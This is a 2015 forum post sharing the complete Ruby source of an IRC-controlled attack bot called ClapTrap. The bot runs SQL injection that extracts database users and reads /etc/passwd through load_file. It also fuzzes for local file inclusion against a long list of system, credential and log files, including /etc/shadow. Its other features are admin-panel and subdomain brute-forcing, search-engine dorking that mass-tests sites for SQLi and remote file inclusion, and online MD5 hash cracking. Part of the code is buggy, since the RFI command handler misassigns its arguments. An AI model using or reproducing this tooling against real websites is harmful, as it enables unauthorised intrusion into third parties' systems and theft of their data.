[Ruby] ClapTrap IRC Bot 0.5
Topic: [Ruby] ClapTrap IRC Bot 0.5 (Read 5887 times)
BigBear
{ L5 } Smurf
Posts: 594
« on: September 26, 2015, 12:04:10 am »
Ruby translation of my IRC bot called ClapTrap.
It has the following options:
SQLI scanner
LFI scanner
Administration panel finder
IP locator
DNS finder
SQLI and RFI finder on Google
MD5 hash cracker
URL shortener using tinyurl
HTTP fingerprinting
Base64, hex and ASCII encoder
The code:
Code: Ruby
#!/usr/bin/ruby
#Claptrap IRC Bot 0.5
#(C) Doddy Hackman 2015
require "socket"
require "open-uri"
require "net/http"
require "resolv"
require "base64"
require "digest/md5"
$timeout = "1"
# Functions
def head()
  print "\n\n
@@@@ @ @ @@@@@ @@@@@ @@@@@ @ @@@@@ @ @@@@@ @@@@
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @@@@@ @ @@@@@ @ @ @@@@@ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @@@@@ @ @ @ @ @@@@@ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@@@@ @@@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@
\n\n"
end
def copyright()
  print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end
#
# Functions ClapTrap
def get_ip(hostname)
  begin
    return Resolv.getaddress(hostname)
  rescue
    return "Error"
  end
end
def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end
def response_code(web)
  begin
    return Net::HTTP.get_response(URI(web)).code
  rescue
    return "404"
  end
end
def tomar(web,arg)
  begin
    headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    uri = URI(web)
    http = Net::HTTP.new(uri.host, uri.port)
    return http.post(uri.path,arg, headers).body
  rescue
    return "Error"
  end
end
def toma_ssl(web)
  uri = URI.parse(web)
  nave = Net::HTTP.new(uri.host, uri.port)
  nave.use_ssl = true
  nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
  return nave.get(uri.request_uri,{"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end
def cortar(pages)
  final = ""
  finales = []
  pages.flatten.each do |page|
    if page=~/(.*)=(.*)/
      parte1 = $1
      parte2 = $2
      final = parte1 + "="
      finales.push(final)
    end
  end
  return finales
end
def google(dork,pages)
  links = []
  dork = dork.sub(/ /,"+")
  contador = 0
  for i in ("1"..pages)
    contador += 10
    code = toma_ssl("https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s)
    paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
    paginas.flatten.each do |pagina|
      partes = pagina
      if partes=~/url\?q=(.*)&amp;sa/
        parte = $1
        link = URI::decode(parte)
        links.push(link)
      end
    end
  end
  links = links.uniq
  return links
end
def google_recursive(dork,pages)
  dork = dork.sub(/ /,"+")
  contador = 0
  guardo = []
  for i in ("1"..pages)
    contador += 10
    url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
    code = toma_ssl(url)
    links = URI::extract(code)
    links.each do |link|
      if link=~/cache:(.*?):(.*?)\+/
        link_final = "http://"+$2
        link_final = URI::decode(link_final)
        guardo.push(link_final)
      end
    end
  end
  guardo = guardo.uniq
  return guardo
end
def bing(dork,pages)
  guardo = []
  dork = dork.sub(/ /,"+")
  contador = 0
  for i in ("1"..pages)
    contador += 10
    code = toma("http://www.bing.com/search?q="+dork+"&first="+contador.to_s)
    links = code.scan(/<h2><a href="(.*?)" h/)
    links.flatten.each do |link|
      link_final = URI::decode(link)
      if not link_final=~/http:\/\/778802\.r\.msn\.com\//
        guardo.push(link_final)
      end
    end
    links = code.scan(/<h3><a href="(.*?)" h/)
    links.flatten.each do |link|
      link_final = URI::decode(link)
      if not link_final=~/http:\/\/778802\.r\.msn\.com\//
        guardo.push(link_final)
      end
    end
  end
  guardo = guardo.uniq
  return guardo
end
def bypass(op)
  if op=="--"
    return "+","--"
  elsif op=="/*"
    return "/**/","/**/"
  elsif op=="%20"
    return "%20","%00"
  else
    return "+","--"
  end
end
def decode_hex(text)
  text = text.sub("0x","")
  return [text].pack('H*')
end
def encode_hex(text)
  return "0x"+text.unpack('H*')[0]
end
def httpfinger(page)
  respuesta = ""
  begin
    nave = Net::HTTP.start(page)
    headers = nave.head("/")
    headers.each do |name,value|
      respuesta = respuesta + "[+] "+name+" : "+value+"\n"
    end
    nave.finish
  rescue
    respuesta = "Error"
  end
  return respuesta
end
##
def locateip(target)
  resultado = ""
  resultado = resultado + "\n[+] Getting IP ...\n"
  ip = get_ip(target)
  resultado = resultado + "\n[+] IP : "+ip+"\n"
  web = "http://www.melissadata.com/lookups/iplocation.asp"
  resultado = resultado + "\n[+] Locating ...\n\n"
  code = tomar(web,"ipaddress="+ip+"&btn=Submit")
  if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
    resultado = resultado + "[+] City : "+$2+"\n"
  else
    resultado = resultado + "[+] City : Not Found\n"
  end
  if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
    resultado = resultado + "[+] Country : "+$2+"\n"
  else
    resultado = resultado + "[+] Country : Not Found\n"
  end
  if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
    resultado = resultado + "[+] State or Region : "+$2+"\n";
  else
    resultado = resultado + "[+] State of Region : Not Found\n"
  end
  resultado = resultado + "\n[+] Getting DNS ...\n\n"
  control = "0"
  code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
  dnss = code.scan(/whois\/(.*?)\">Whois/)
  dnss.flatten.each do |dns|
    begin
      if dns != ""
        control = "1"
        resultado = resultado + "[+] DNS Found : "+dns
      end
    end
  end
  if control=="0"
    resultado = resultado + "\n[-] DNS Not Found\n"
  end
  return resultado
end
def details(url,by)
  pass1,pass2 = bypass(by)
  resultado = ""
  hextest = "0x2f6574632f706173737764" #/etc/passwd
  hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  web1 = url.sub(/hackman/,"0x4b30425241")
  web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
  resultado = resultado + "\n[+] Extracting information of the DB\n"
  code1 = toma(web2)
  if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
    user,data,ver = $1,$2,$3
    resultado = resultado + "\n[+] Username : "+user
    resultado = resultado + "\n[+] Database : "+data
    resultado = resultado + "\n[+] Version : "+ver+"\n\n"
  else
    resultado = resultado + "[-] Not Found\n"
  end
  code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  code4 = toma(web3)
  if code2=~/K0BRA/
    resultado = resultado + "[+] Mysql User : ON\n"
  end
  if code3=~/K0BRA/
    resultado = resultado + "[+] information_schema : ON\n"
  end
  if code4=~/ERTOR854/
    resultado = resultado + "[+] load_file : ON\n"
  end
  return resultado
end
def findlength(url,by)
  pass1,pass2 = bypass(by)
  z = "1"
  control = "0"
  resultado = ""
  resultado = resultado + "\n[+] Finding columns lenght ...\n\n"
  x = "concat(0x4b30425241,1,0x4b30425241)"
  for num in ('2'..'25')
    z = z+","+num
    x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
    code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
    if code=~/K0BRA(.*?)K0BRA/
      resultado = resultado + "[+] The Page has "+num+" columns\n"
      resultado = resultado + "[+] The number "+$1+" print data\n"
      z = z.sub($1,"hackman")
      sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
      control = "1"
      break
    end
  end
  if control != "1"
    resultado = resultado + "[-] Columns lenght not found\n"
  end
  return resultado,sqli,control
end
def scanner_sqli(page,by)
  pass1,pass2 = bypass(by)
  resultado = ""
  rta1 = ""
  rta2 = ""
  resultado = resultado + "[+] Testing vulnerability ...\n\n"
  codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  if codeuno != codedos
    resultado = resultado + "[+] Vulnerable !\n"
    rta1,sqli,control = findlength(page,by)
    if control=="1"
      rta2 = details(sqli,"--")
    end
  else
    resultado = resultado + "[-] Not Vulnerable\n"
  end
  resultado = resultado + rta1 + rta2
  return resultado
end
def scanner_lfi(web)
  resultado = ""
  files = ['c:/xampp/here.php','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc']
  resultado = resultado + "[+] Testing the vulnerability LFI...\n\n"
  code = toma(web+"'")
  if code=~/No such file or directory in <b>(.*)<\/b> on line/
    fpd = $1
    resultado = resultado + "[+] LFI Detected\n\n"
    resultado = resultado + "[Full Path Discloure]: "+fpd+"\n"
    resultado = resultado + "\n[+] Fuzzing Files\n\n"
    files.each do |file|
      code = toma(web+file)
      if not code=~/No such file or directory in/
        resultado= resultado + "[Link] : "+web+file+"\n"
      end
    end
    resultado = resultado + "\n[+] Done\n"
  else
    resultado = resultado + "[-] Not Vulnerable to LFI\n\n"
  end
  return resultado
end
def scanner_panel(page)
  resultado = ""
  panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
  resultado = resultado + "[+] Scanning ...\n\n"
  control = "0"
  panels.each do |panel|
    begin
      url = page+"/"+panel
      status_code = response_code(url)
      if status_code=="200"
        resultado = resultado + "[+] Link : "+url+"\n"
        control = "1"
      end
    end
  end
  if control=="1"
    resultado = resultado + "\n[+] Done\n"
  else
    resultado = resultado + "\n[-] Not Found\n"
  end
  return resultado
end
def get_httpfinger(page)
  resultado = ""
  resultado = resultado + "[+] Searching ...\n\n"
  resultado = resultado + httpfinger(page)
  return resultado
end
def crack_md5(md5)
  resultado = ""
  resultado = resultado + "[+] Cracking ...\n\n"
  code = tomar("http://md5online.net/index.php","pass="+md5+"&option=hash2text&send=Submit")
  if code=~/pass : <b>(.*?)<\/b>/
    password = $1
    resultado = resultado + "[+] md5online.net -> "+password+"\n"
  else
    resultado = resultado + "[-] md5online.net -> Not Found" + "\n"
  end
  code = tomar("http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php","md5="+md5)
  if code=~/<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/
    password = $1
    resultado = resultado + "[+] md5.my-addr.co -> "+password+"\n"
  else
    resultado = resultado + "[-] md5.my-addr.co -> Not Found" +"\n"
  end
  code = tomar("http://md5decryption.com/index.php","hash="+md5+"&submit=Decrypt It!")
  if code=~/Decrypted Text: <\/b>(.*?)<\/font>/
    password = $1
    resultado = resultado + "[+] md5decryption.com -> "+password+"\n"
  else
    resultado = resultado + "[-] md5decryption.com -> Not Found"+"\n"
  end
  return resultado
end
def tiny_url(page)
  resultado = ""
  code = toma("http://tinyurl.com/api-create.php?url="+page)
  if code=~/http/
    resultado = resultado + "[+] Link : "+code
  else
    resultado = resultado + "[-] Error"
  end
  return resultado
end
def codificar_hex(text)
  return "[+] Result : "+encode_hex(text)
end
def decodificar_hex(text)
  return "[+] Result : "+decode_hex(text)
end
def codificar_base64(text)
  return "[+] Result : "+Base64.encode64(text).chomp
end
def decodificar_base64(text)
  return "[+] Result : "+Base64.decode64(text).chomp
end
def codificar_ascii(text)
  resultado = ""
  resultado = resultado + "[+] Result : "+text.split("").map(&:ord).to_s
  return resultado
end
def md5_encode(text)
  return "[+] Result : "+Digest::MD5.hexdigest(text).chomp
end
def scanner_dns(domain)
paths = ["www","www1","www2","www3","ftp","ns","mail","3com","aix","apache","back","bind","boreder","bsd","business","chains","cisco","content","corporate","cpv","dns","domino","dominoserver","download","e-mail","e-safe","email","esafe","external","extranet","firebox","firewall","front","fw","fw0","fwe","fw-1","firew","gate","gatekeeper","gateway","gauntlet","group","help","hop","hp","hpjet","hpux","http","https","hub","ibm","ids","info","inside","internal","internet","intranet","ipfw","irix","jet","list","lotus","lotusdomino","lotusnotes","lotusserver","mailfeed","mailgate","mailgateway","mailgroup","mailhost","maillist","mailpop","mailrelay","mimesweeper","ms","msproxy","mx","nameserver","news","newsdesk","newsfeed","newsgroup","newsroom","newsserver","nntp","notes","noteserver","notesserver","nt","outside","pix","pop","pop3","pophost","popmail","popserver","print","printer","private","proxy","proxyserver","public","qpop","raptor","read","redcreek","redhat","route","router","scanner","screen","screening","ecure","seek","smail","smap","smtp","smtpgateway","smtpgw","solaris","sonic","spool","squid","sun","sunos","suse","switch","transfer","trend","trendmicro","vlan","vpn","wall","web","webmail","webserver","webswitch","win2000","win2k","upload","file","fileserver","storage","backup","share","core","gw","wingate","main","noc","home","radius","security","access","dmz","domain","sql","mysql","mssql","postgres","db","database","imail","imap","exchange","sendmail","louts","test","logs","stage","staging","dev","devel","ppp","chat","irc","eng","admin","unix","linux","windows","apple","hp-ux","bigip","pc"]
resultado = ""
  resultado = resultado + "[+] Searching DNS ...\n\n"
  control = "0"
  paths.each do |path|
    begin
      url = "http://"+path+"."+domain
      status_code = response_code(url)
      if status_code=="200"
        resultado = resultado + "[+] Link : "+url+"\n"
        control = "1"
      end
    end
  end
  if control=="1"
    resultado = resultado + "\n[+] Done\n"
  else
    resultado = resultado + "\n[-] Not Found\n"
  end
  return resultado
end
def sqli_finder(dork,pages,opcion)
  resultado = ""
  if opcion=="bing"
    resultado = resultado + "[+] Searching in Bing ...\n\n"
    links = cortar(bing(dork,pages))
    resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n\n"
    if links.count.to_s=="0"
      resultado = resultado + "[-] Links not found\n"
    end
    links.flatten.each do |link|
      resultado = resultado + "[+] Link : "+link
      begin
        url = toma(link + "-1+union+select+1--")
        if url=~/The used SELECT statements have a different number of columns/
          resultado = resultado + " [OK]\n"
        else
          resultado = resultado + " [FAIL]\n"
        end
      rescue
        resultado = resultado + " [FAIL]\n"
      end
    end
    resultado = resultado + "\n[+] Finished\n"
  elsif opcion=="google"
    resultado = resultado + "[+] Searching in Google ...\n\n"
    links = cortar(google(dork,pages))
    if links.count.to_s=="0"
      resultado = resultado + "[+] Searching in Google again ...\n\n"
      links = cortar(google_recursive(dork,pages))
    end
    resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n\n"
    if links.count.to_s=="0"
      resultado = resultado + "[-] Links not found"
    end
    links.flatten.each do |link|
      resultado = resultado + "[+] Link : "+link
      begin
        url = toma(link + "-1+union+select+1--")
        if url=~/The used SELECT statements have a different number of columns/
          resultado = resultado + " [OK]\n"
        else
          resultado = resultado + " [FAIL]\n"
        end
      rescue
        resultado = resultado + " [FAIL]\n"
      end
    end
  else
    resultado = "[-] Bad Option"
  end
  return resultado
end
def rfi_finder(dork,pages,opcion)
  resultado = ""
  if opcion=="bing"
    resultado = resultado + "[+] Searching in Bing ...\n\n"
    links = cortar(bing(dork,pages))
    resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n\n"
    if links.count.to_s=="0"
      resultado = resultado + "[-] Links not found\n"
    end
    links.flatten.each do |link|
      resultado = resultado + "[+] Link : "+link
      begin
        url = toma(link + "http://www.supertangas.com/")
        if url=~/Los mejores TANGAS de la red/i
          resultado = resultado + " [OK]\n"
        else
          resultado = resultado + " [FAIL]\n"
        end
      rescue
        resultado = resultado + " [FAIL]\n"
      end
    end
    resultado = resultado + "\n[+] Finished\n"
  elsif opcion=="google"
    resultado = resultado + "[+] Searching in Google ...\n\n"
    links = cortar(google(dork,pages))
    if links.count.to_s=="0"
      resultado = resultado + "[+] Searching in Google again ...\n\n"
      links = cortar(google_recursive(dork,pages))
    end
    resultado = resultado + "[+] Pages Count : "+links.count.to_s+"\n\n"
    if links.count.to_s=="0"
      resultado = resultado + "[-] Links not found"
    end
    links.flatten.each do |link|
      resultado = resultado + "[+] Link : "+link
      begin
        url = toma(link + "http://www.supertangas.com/")
        if url=~/Los mejores TANGAS de la red/i
          resultado = resultado + " [OK]\n"
        else
          resultado = resultado + " [FAIL]\n"
        end
      rescue
        resultado = resultado + " [FAIL]\n"
      end
    end
  else
    resultado = "[-] Bad Option"
  end
  return resultado
end
#
def respuesta(to,texto)
  resultado = texto.split("\n")
  resultado.flatten.each do |linea|
    if linea != ""
      $irc.print "PRIVMSG #{to} #{linea}\n"
      sleep $timeout.to_i
    end
  end
end
def bot_online(host,port,canal,admin)
  print "\n[+] Connecting ...\n"
  begin
    $irc = TCPSocket.open(host,port)
  rescue
    print "\n[-] Error connecting\n"
  else
    nick = "ClapTrap"
    $irc.print "NICK "+nick+"\r\n"
    $irc.print "USER "+nick+" 1 1 1 1\r\n"
    $irc.print "JOIN #{canal}\r\n"
    print "\n[+] Online\n"
    while 1
      code = $irc.recv(9999)
      if code=~/PING (.*)/
        $irc.print "PONG #{$1}\n"
      end
      if code=~/:(.*)!(.*) PRIVMSG (.*) :(.*)/
        dedonde = $1
        mensaje = $4
        if dedonde==admin
          if mensaje=~/!sqli (.*)/
            arg1 = $1
            arg1 = arg1.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin,scanner_sqli(arg1,"--"))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!lfi (.*)/
            arg1 = $1
            arg1 = arg1.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin,scanner_lfi(arg1))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!panel(.*)/
            arg1 = $1
            arg1 = arg1.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin,scanner_panel(arg1))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!fuzzdns (.*)/
            arg1 = $1
            arg1 = arg1.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin,scanner_dns(arg1))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!locateip (.*)/
            arg1 = $1
            arg1 = arg1.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin, locateip(arg1))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!sqlifinder (.*) (.*) (.*)/
            arg1 = $1
            arg2 = $2
            arg3 = $3
            arg1 = arg1.chomp
            arg2 = arg2.chomp
            arg3 = arg3.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin,sqli_finder(arg1,arg2,arg3))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!rfifinder (.*) (.*) (.*)/
            arg1 = $1
            arg1 = $2
            arg1 = $3
            arg1 = arg1.chomp
            arg2 = arg2.chomp
            arg3 = arg3.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin,rfi_finder(arg1,arg2,arg3))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!crackit (.*)/
            arg1 = $1
            arg1 = arg1.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin,crack_md5(arg1))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!tinyurl (.*)/
            arg1 = $1
            arg1 = arg1.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin,tiny_url(arg1))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!httpfinger (.*)/
            arg1 = $1
            arg1 = arg1.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin,get_httpfinger(arg1))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!md5 (.*)/
            arg1 = $1
            arg1 = arg1.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin,md5_encode(arg1))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!base64 (.*) (.*)/
            arg1 = $1
            arg2 = $2
            arg1 = arg1.chomp
            arg2 = arg2.chomp
            if arg2=="encode"
              $irc.print "PRIVMSG #{admin} [+] Working ...\n"
              respuesta(admin,codificar_base64(arg1))
              $irc.print "PRIVMSG #{admin} [+] Finished\n"
            end
            if arg2=="decode"
              $irc.print "PRIVMSG #{admin} [+] Working ...\n"
              respuesta(admin,decodificar_base64(arg1))
              $irc.print "PRIVMSG #{admin} [+] Finished\n"
            end
          end
          if mensaje=~/!hex (.*) (.*)/
            arg1 = $1
            arg2 = $2
            arg1 = arg1.chomp
            arg2 = arg2.chomp
            if arg2=="encode"
              $irc.print "PRIVMSG #{admin} [+] Working ...\n"
              respuesta(admin,codificar_hex(arg1))
              $irc.print "PRIVMSG #{admin} [+] Finished\n"
            end
            if arg2=="decode"
              $irc.print "PRIVMSG #{admin} [+] Working ...\n"
              respuesta(admin,decodificar_hex(arg1))
              $irc.print "PRIVMSG #{admin} [+] Finished\n"
            end
          end
          if mensaje=~/!ascii (.*)/
            arg1 = $1
            arg1 = arg1.chomp
            $irc.print "PRIVMSG #{admin} [+] Working ...\n"
            respuesta(admin,codificar_ascii(arg1))
            $irc.print "PRIVMSG #{admin} [+] Finished\n"
          end
          if mensaje=~/!help/
            about = ""
            about = about + "Hi , I am ClapTrap an assistant robot programmed by Doddy Hackman in the year 2014" + "\n";
            about = about + "[++] Commands" + "\n";
            about = about + "[+] !help" + "\n";
            about = about + "[+] !locateip <web>" + "\n";
            about = about + "[+] !sqlifinder <dork> <count pages> <google/bing>" + "\n";
            about = about + "[+] !rfifinder <dork> <count pages> <google/bing>" + "\n";
            about = about + "[+] !panel <page>" + "\n";
            about = about + "[+] !fuzzdns <domain>" + "\n";
            about = about + "[+] !sqli <page>" + "\n";
            about = about + "[+] !lfi <page>" + "\n";
            about = about + "[+] !crackit <hash>" + "\n";
            about = about + "[+] !tinyurl <page>" + "\n";
            about = about + "[+] !httpfinger <page>" + "\n";
            about = about + "[+] !md5 <text>" + "\n";
            about = about + "[+] !base64 <encode/decode> <text>" + "\n";
            about = about + "[+] !ascii <encode/decode> <text>" + "\n";
            about = about + "[+] !hex <encode/decode> <text>" + "\n";
            about = about + "[++] Enjoy this IRC Bot" + "\n";
            respuesta(admin,about)
          end
        end
      end
    end
  end
end
head()
print "[+] Host : "
host = gets.chomp
print "\n[+] Port : "
port = gets.chomp
print "\n[+] Channel : "
channel = gets.chomp
print "\n[+] Admin : "
admin = gets.chomp
bot_online(host,port,channel,admin)
copyright()
# The End ?
That's all.
« Last Edit: September 26, 2015, 12:06:28 am by Doddy »
